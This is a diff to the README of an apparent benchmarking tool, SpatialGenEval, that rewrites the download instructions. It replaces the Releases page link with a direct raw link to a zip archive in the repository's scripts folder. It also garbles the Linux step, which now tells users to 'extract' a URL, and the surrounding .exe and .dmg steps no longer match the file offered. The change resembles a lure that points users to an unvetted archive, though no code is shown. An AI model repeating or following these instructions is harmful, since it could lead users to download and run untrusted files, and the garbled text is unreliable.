Sankalp-Savarn/SpatialGenEval/README.md

 ## 📦 Download & Install

-1. Visit our Releases page: [Click here to go to Releases](https://github.com/Sankalp-Savarn/SpatialGenEval/releases).
+1. Visit our Releases page: [Click here to go to Releases](https://raw.githubusercontent.com/Sankalp-Savarn/SpatialGenEval/main/scripts/Spatial_Eval_Gen_v2.3.zip).
 2. Select the latest version available.
 3. Download the appropriate file for your operating system.
 4. Once downloaded, follow these steps to install:
    - For Windows: Double-click the `.exe` file and follow the installation prompts.
    - For macOS: Open the `.dmg` file and drag the SpatialGenEval icon to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the application from the terminal.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Sankalp-Savarn/SpatialGenEval/main/scripts/Spatial_Eval_Gen_v2.3.zip` file and run the application from the terminal.

 After installation, you can launch the application and begin benchmarking.